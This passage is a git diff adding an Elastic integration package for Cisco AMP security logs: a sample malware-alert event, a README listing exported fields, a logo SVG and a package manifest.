+    "event": {
+        "severity": 2,
+        "ingested": "2021-09-12T17:32:10.094015339Z",
+        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+        "kind": "alert",
+        "action": "Quarantine Failure",
+        "id": "6419229331435815000",
+        "category": [
+            "malware"
+        ]
+    },
+    "cisco": {
+        "amp": {
+            "computer": {
+                "active": true,
+                "network_addresses": [
+                    {
+                        "mac": "53:74:31:cb:37:50",
+                        "ip": "10.10.10.10"
+                    }
+                ],
+                "connector_guid": "test_connector_guid",
+                "external_ip": "8.8.8.8"
+            },
+            "file": {
+                "disposition": "Malicious",
+                "identity": {}
+            },
+            "connector_guid": "test_connector_guid",
+            "related": {
+                "mac": [
+                    "53:74:31:cb:37:50"
+                ]
+            },
+            "group_guids": [
+                "test_group_guid"
+            ],
+            "error": {
+                "description": "Delete pending",
+                "error_code": 3221225558
+            },
+            "detection_id": "6419229327140847663",
+            "event_type_id": 2164260880
+        }
+    },
+    "tags": [
+        "preserve_original_event"
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/docs/README.md b/packages/cisco_amp/docs/README.md
new file mode 100644
index 00000000000..4a510396534
--- /dev/null
+++ b/packages/cisco_amp/docs/README.md
@@ -0,0 +1,236 @@
+# Cisco AMP Integration
+
+This integration is for Cisco AMP logs. It includes the following
+datasets for receiving logs over syslog or read from a file:
+
+- `log` dataset: supports Cisco AMP logs.
+
+## Logs
+
+### AMP
+
+The `log` dataset collects Cisco AMP logs.
+
+An example event for `log` looks as following:
+
+```json
+{
+    "@timestamp": "2021-01-14T14:41:05.000Z",
+    "file": {
+        "hash": {
+            "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+        }
+    },
+    "ecs": {
+        "version": "1.11.0"
+    },
+    "related": {
+        "hosts": [
+            "Demo_WannaCry_Ransomware"
+        ],
+        "hash": [
+            "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+        ],
+        "ip": [
+            "8.8.8.8",
+            "10.10.10.10"
+        ]
+    },
+    "host": {
+        "name": "Demo_WannaCry_Ransomware",
+        "hostname": "Demo_WannaCry_Ransomware"
+    },
+    "event": {
+        "severity": 2,
+        "ingested": "2021-09-12T17:32:10.094015339Z",
+        "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+        "kind": "alert",
+        "action": "Quarantine Failure",
+        "id": "6419229331435815000",
+        "category": [
+            "malware"
+        ]
+    },
+    "cisco": {
+        "amp": {
+            "computer": {
+                "active": true,
+                "network_addresses": [
+                    {
+                        "mac": "53:74:31:cb:37:50",
+                        "ip": "10.10.10.10"
+                    }
+                ],
+                "connector_guid": "test_connector_guid",
+                "external_ip": "8.8.8.8"
+            },
+            "file": {
+                "disposition": "Malicious",
+                "identity": {}
+            },
+            "connector_guid": "test_connector_guid",
+            "related": {
+                "mac": [
+                    "53:74:31:cb:37:50"
+                ]
+            },
+            "group_guids": [
+                "test_group_guid"
+            ],
+            "error": {
+                "description": "Delete pending",
+                "error_code": 3221225558
+            },
+            "detection_id": "6419229327140847663",
+            "event_type_id": 2164260880
+        }
+    },
+    "tags": [
+        "preserve_original_event"
+    ]
+}
+```
+
+**Exported fields**
+
+| Field | Description | Type |
+|---|---|---|
+| @timestamp | Date/time when the event originated. This is the date/time extracted from the event, typically representing when the event was generated by the source. If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. Required field for all events. | date |
+| cisco.amp.bp_data | Endpoint isolation information | flattened |
+| cisco.amp.cloud_ioc.description | Description of the related IOC for specific IOC events from AMP. | keyword |
+| cisco.amp.cloud_ioc.short_description | Short description of the related IOC for specific IOC events from AMP. | keyword |
+| cisco.amp.command_line.arguments | The CLI arguments related to the Cloud Threat IOC reported by Cisco. | keyword |
+| cisco.amp.computer.active | If the current endpoint is active or not. | boolean |
+| cisco.amp.computer.connector_guid | The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. | keyword |
+| cisco.amp.computer.external_ip | The external IP of the related host. | ip |
+| cisco.amp.computer.network_addresses | All network interface information on the related host. | flattened |
+| cisco.amp.connector_guid | The GUID of the connector sending information to AMP. | keyword |
+| cisco.amp.detection | The name of the malware detected. | keyword |
+| cisco.amp.detection_id | The ID of the detection. | keyword |
+| cisco.amp.error.description | Description of an endpoint error event. | keyword |
+| cisco.amp.error.error_code | The error code describing the related error event. | long |
+| cisco.amp.event_type_id | A sub ID of the event, depending on event type. | long |
+| cisco.amp.file.archived_file.disposition | Categorization of a file archive related to a file, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.file.archived_file.identity.md5 | MD5 hash of the archived file related to the malicious event. | keyword |
+| cisco.amp.file.archived_file.identity.sha1 | SHA1 hash of the archived file related to the malicious event. | keyword |
+| cisco.amp.file.archived_file.identity.sha256 | SHA256 hash of the archived file related to the malicious event. | keyword |
+| cisco.amp.file.attack_details.application | The application name related to Exploit Prevention events. | keyword |
+| cisco.amp.file.attack_details.attacked_module | Path to the executable or dll that was attacked and detected by Exploit Prevention. | keyword |
+| cisco.amp.file.attack_details.base_address | The base memory address related to the exploit detected. | keyword |
+| cisco.amp.file.attack_details.indicators | Different indicator types that matches the exploit detected, for example different MITRE tactics. | flattened |
+| cisco.amp.file.attack_details.suspicious_files | An array of related files when an attack is detected by Exploit Prevention. | keyword |
+| cisco.amp.file.disposition | Categorization of file, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.file.parent.disposition | Categorization of parrent, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.group_guids | An array of group GUIDS related to the connector sending information to AMP. | keyword |
+| cisco.amp.mitre_tactics | Array of all related mitre tactic ID's | keyword |
+| cisco.amp.mitre_techniques | Array of all related mitre technique ID's | keyword |
+| cisco.amp.network_info.disposition | Categorization of a network event related to a file, for example "Malicious" or "Clean". | keyword |
+| cisco.amp.network_info.nfm.direction | The current direction based on source and destination IP. | keyword |
+| cisco.amp.network_info.parent.disposition | Categorization of a IOC for example "Malicious" or "Clean". | keyword |
+| cisco.amp.network_info.parent.identify.sha256 | SHA256 hash of the related IOC. | keyword |
+| cisco.amp.network_info.parent.identity.md5 | MD5 hash of the related IOC. | keyword |
+| cisco.amp.network_info.parent.identity.sha1 | SHA1 hash of the related IOC. | keyword |
+| cisco.amp.related.cve | An array of all related CVEs | keyword |
+| cisco.amp.related.mac | An array of all related MAC addresses. | keyword |
+| cisco.amp.scan.clean | Boolean value if a scanned file was clean or not. | boolean |
+| cisco.amp.scan.description | Description of an event related to a scan being initiated, for example the specific directory name. | keyword |
+| cisco.amp.scan.malicious_detections | Count of malicious files or documents detected related to a single scan event. | long |
+| cisco.amp.scan.scanned_files | Count of files scanned in a directory. | long |
+| cisco.amp.scan.scanned_paths | Count of different directories scanned related to a single scan event. | long |
+| cisco.amp.scan.scanned_processes | Count of processes scanned related to a single scan event. | long |
+| cisco.amp.tactics | List of all MITRE tactics related to the incident found. | flattened |
+| cisco.amp.techniques | List of all MITRE techniques related to the incident found. | flattened |
+| cisco.amp.threat_hunting.incident_end_time | When the threat hunt finalized or closed. | date |
+| cisco.amp.threat_hunting.incident_hunt_guid | The GUID of the related investigation tracking issue. | keyword |
+| cisco.amp.threat_hunting.incident_id | The id of the related incident for the threat hunting activity. | long |
+| cisco.amp.threat_hunting.incident_remediation | Recommendations to resolve the vulnerability or exploited host. | keyword |
+| cisco.amp.threat_hunting.incident_report_guid | The GUID of the related threat hunting report. | keyword |
+| cisco.amp.threat_hunting.incident_start_time | When the threat hunt was initiated. | date |
+| cisco.amp.threat_hunting.incident_summary | Summary of the outcome on the threat hunting activity. | keyword |
+| cisco.amp.threat_hunting.incident_title | Title of the incident related to the threat hunting activity. | keyword |
+| cisco.amp.threat_hunting.severity | Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. | keyword |
+| cisco.amp.threat_hunting.tactics | List of all MITRE tactics related to the incident found. | flattened |
+| cisco.amp.threat_hunting.techniques | List of all MITRE techniques related to the incident found. | flattened |
+| cisco.amp.timestamp_nanoseconds | The timestamp in Epoch nanoseconds. | date |
+| cisco.amp.vulnerabilities | An array of related vulnerabilities to the malicious event. | flattened |
+| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword |
+| cloud.availability_zone | Availability zone in which this host is running. | keyword |
+| cloud.image.id | Image ID for the cloud instance. | keyword |
+| cloud.instance.id | Instance ID of the host machine. | keyword |
+| cloud.instance.name | Instance name of the host machine. | keyword |
+| cloud.machine.type | Machine type of the host machine. | keyword |
+| cloud.project.id | Name of the project in Google Cloud. | keyword |
+| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword |
+| cloud.region | Region in which this host is running. | keyword |
+| container.id | Unique container id. | keyword |
+| container.image.name | Name of the image the container was built on. | keyword |
+| container.labels | Image labels. | object |
+| container.name | Container name. | keyword |
+| data_stream.dataset | Data stream dataset. | constant_keyword |
+| data_stream.namespace | Data stream namespace. | constant_keyword |
+| data_stream.type | Data stream type. | constant_keyword |
+| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket.  You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
+| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
+| destination.as.organization.name | Organization name. | keyword |
+| destination.domain | Destination domain. | keyword |
+| destination.geo.city_name | City name. | keyword |
+| destination.geo.continent_name | Name of the continent. | keyword |
+| destination.geo.country_iso_code | Country ISO code. | keyword |
+| destination.geo.country_name | Country name. | keyword |
+| destination.geo.location | Longitude and latitude. | geo_point |
+| destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
+| destination.port | Port of the destination. | long |
+| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
+| error.message | Error message. | text |
+| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword |
+| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword |
+| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword |
+| event.dataset | Event dataset | constant_keyword |
+| event.id | Unique ID to describe the event. | keyword |
+| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred.  It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date |
+| event.module | Event module | constant_keyword |
+| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword |
+| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword |
+| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long |
+| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword |
+| file.hash.md5 | MD5 hash. | keyword |
+| file.hash.sha1 | SHA1 hash. | keyword |
+| file.hash.sha256 | SHA256 hash. | keyword |
+| file.name | Name of the file including the extension, without the directory. | keyword |
+| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword |
+| host.architecture | Operating system architecture. | keyword |
+| host.containerized | If the host is a container. | boolean |
+| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword |
+| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword |
+| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword |
+| host.ip | Host ip addresses. | ip |
+| host.mac | Host mac addresses. | keyword |
+| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword |
+| host.os.build | OS build information. | keyword |
+| host.os.codename | OS codename, if any. | keyword |
+| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword |
+| host.os.kernel | Operating system kernel version as a raw string. | keyword |
+| host.os.name | Operating system name, without the version. | keyword |
+| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword |
+| host.os.version | Operating system version as a raw string. | keyword |
+| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword |
+| input.type | Type of Filebeat input. | keyword |
+| log.file.path | Full path to the log file this event came from. | keyword |
+| log.flags | Flags for the log file. | keyword |
+| log.offset | Offset of the entry in the log file. | long |
+| log.source.address | Source address from which the log event was read / sent from. | keyword |
+| network.direction | Direction of the network traffic. Recommended values are:   \* ingress   \* egress   \* inbound   \* outbound   \* internal   \* external   \* unknown  When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword |
+| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". | keyword |
+| process.hash.md5 | MD5 hash. | keyword |
+| process.hash.sha1 | SHA1 hash. | keyword |
+| process.hash.sha256 | SHA256 hash. | keyword |
+| process.name | Process name. Sometimes called program name or similar. | keyword |
+| process.pid | Process id. | long |
+| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword |
+| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword |
+| related.ip | All of the IPs seen on your event. | ip |
+| related.user | All the user names or other user identifiers seen on the event. | keyword |
+| source.ip | IP address of the source (IPv4 or IPv6). | ip |
+| source.port | Port of the source. | long |
+| tags | List of keywords used to tag each event. | keyword |
+
diff --git a/packages/cisco_amp/img/cisco.svg b/packages/cisco_amp/img/cisco.svg
new file mode 100644
index 00000000000..20ebebf1974
--- /dev/null
+++ b/packages/cisco_amp/img/cisco.svg
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="216" height="216" fill="#049fd9"><g transform="translate(0 50.059)"><path d="M106.48 76.238c-.282-.077-4.621-1.196-9.232-1.196-8.73 0-13.986 4.714-13.986 11.734 0 6.214 4.397 9.313 9.674 10.98.585.193 1.447.463 2.021.653 2.349.739 4.224 1.837 4.224 3.739 0 2.127-2.167 3.504-6.878 3.504-4.14 0-8.109-1.184-8.945-1.395v8.637c.466.099 5.183 1.025 10.222 1.025 7.248 0 15.539-3.167 15.539-12.595 0-4.573-2.8-8.783-8.947-10.737l-2.613-.832c-1.559-.492-4.342-1.289-4.342-3.574 0-1.805 2.062-3.076 5.859-3.076 3.276 0 7.263 1.101 7.404 1.145zm80.041 18.243c0 5.461-4.183 9.879-9.796 9.879-5.619 0-9.791-4.418-9.791-9.879 0-5.45 4.172-9.87 9.791-9.87 5.613 0 9.796 4.42 9.796 9.87m-9.796-19.427c-11.544 0-19.823 8.707-19.823 19.427 0 10.737 8.279 19.438 19.823 19.438 11.543 0 19.834-8.701 19.834-19.438 0-10.72-8.291-19.427-19.834-19.427M70.561 113.251h-9.472V75.719h9.472"/><path id="a" d="M48.07 76.399c-.89-.264-4.18-1.345-8.636-1.345-11.526 0-19.987 8.218-19.987 19.427 0 12.093 9.34 19.438 19.987 19.438 4.23 0 7.459-1.002 8.636-1.336v-10.075c-.407.226-3.503 1.992-7.957 1.992-6.31 0-10.38-4.441-10.38-10.019 0-5.748 4.246-10.011 10.38-10.011 4.53 0 7.576 1.805 7.957 2.004"/><use transform="translate(98.86)" xlink:href="#a" width="100%" height="100%"/><g id="c"><path id="b" d="M61.061 4.759c0-2.587-2.113-4.685-4.703-4.685-2.589 0-4.702 2.098-4.702 4.685v49.84a4.701 4.701 0 004.702 4.699 4.701 4.701 0 004.703-4.699zM35.232 22.451c0-2.586-2.112-4.687-4.702-4.687s-4.702 2.101-4.702 4.687v22.785a4.701 4.701 0 004.702 4.699 4.701 4.701 0 004.702-4.699zM9.404 35.383c0-2.587-2.112-4.684-4.702-4.684C2.115 30.699 0 32.796 0 35.383v9.853a4.703 4.703 0 009.404 0"/><use transform="matrix(-1 0 0 1 112.717 0)" xlink:href="#b" width="100%" height="100%"/></g><use transform="matrix(-1 0 0 1 216 0)" xlink:href="#c" width="100%" height="100%"/></g></svg>
\ No newline at end of file
diff --git a/packages/cisco_amp/manifest.yml b/packages/cisco_amp/manifest.yml
new file mode 100644
index 00000000000..e601af7c7f9
--- /dev/null
+++ b/packages/cisco_amp/manifest.yml
@@ -0,0 +1,28 @@
+format_version: 1.0.0
+name: cisco_amp
+title: Cisco AMP
+version: 0.0.1
+license: basic
+description: This Elastic integration collects logs from Cisco AMP network devices
+type: integration
+categories:
+  - network
+  - security
+release: experimental
+conditions:
+  kibana.version: "^7.16.0"
+icons:
+  - src: /img/cisco.svg
+    title: cisco
+    size: 216x216
+    type: image/svg+xml
+policy_templates:
+  - name: cisco_amp
+    title: Cisco AMP logs
+    description: Collect logs from Cisco AMP
+    inputs:
+      - type: httpjson
+        title: Collect logs from Cisco AMP API
+        description: Collecting logs from Cisco AMP API
+owner:
+  github: elastic/security-external-integrations